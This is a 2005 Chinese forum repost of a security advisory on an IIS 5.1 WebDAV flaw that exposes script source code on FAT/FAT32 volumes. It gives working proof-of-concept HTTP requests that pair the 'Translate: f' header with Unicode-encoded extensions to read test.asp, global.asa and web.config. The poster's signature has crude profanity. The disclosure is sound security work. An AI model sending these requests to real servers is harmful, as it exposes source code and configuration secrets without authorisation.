[转载]IIS 5.1 FAT/FAT32下WebDAV源代码泄露漏洞及测试方法

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9863
精华: 771
积分: 40912
阅读权限: 200
性别: 男
在线时间: 3985 小时
注册时间: 2004-7-4
最后登录: 2008-11-23

发短消息
加为好友
当前离线

楼主大中小发表于 2005-9-9 22:50 只看该作者

[转载]IIS 5.1 FAT/FAT32下WebDAV源代码泄露漏洞及测试方法

信息来源：ingehenriksen.blogspot.com

Summary
It is possible to remotely view the source code of web script files though a specially crafted WebDAV HTTP request. Only IIS 5.1 seems to be vulnerable. The web script file must be on a FAT or a FAT32 volume, web scripts located on a NTFS are not vulnerable.

Credit:
The information has been provided by Inge Henriksen.
The original article can be found at: http://ingehenriksen.blogspot.co ... ote-viewing-of.html

Details
Vulnerable Systems:
* Microsoft Internet Information Server version 5.1

Immune Systems:
* Microsoft Internet Information Server version 5.0
* Microsoft Internet Information Server version 6.0

WebDAV allows for retrieving streams using the "Translate: f" HTTP header, the processing of this header has logic built into it so that web script files are not processed, this logic can be avoided by using Unicode characters instead in one of the letters of the file. The file must be on a FAT or FAT32 volume to be viewed, a NTFS volume will return a"Forbidden" HTTP response instead.

Proof of Concept #1
I have used the server "www.yourserver.xom" here, replace with your own server name.
1. Format a volume as FAT or FAT32, or use an existing one
2. Create a folder called "www"
3. Add a new ASP file called "test.asp" in "www"
4. Add this code line "<%=Response.write("Hello World")%>" in "test.asp"
5. Open a browser and navigate to "http://www.yourserver.xom/test.asp" and confirm that the text "Hello world" is returned and not the script code.
6. Create a new virtual folder in IIS 5.1 and map it to the folder you made in step 2
7. Open a MSDOS console
8. Type "telnet www.yourserver.xom 80" and hit ENTER
9. Paste the following text block or type it manually:
GET /www/test.as%CF%80 HTTP/1.1
Translate: f
Host: www.yourserver.xom
Connection: Close
10. Hit ENTER twize to signal end of HTTP request
11. You should see "<%=Response.write("Hello World")%>" being returned

Proof of Concept #2
Shows the source of /global.asa:
GET /global.%C4%80sa HTTP/1.1
Translate: f
Host: localhost
Connection: Close

Shows the XML in /web.config:
GET /web.%c4%89onfig HTTP/1.1
Translate: f
Host: localhost
Connection: Close

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››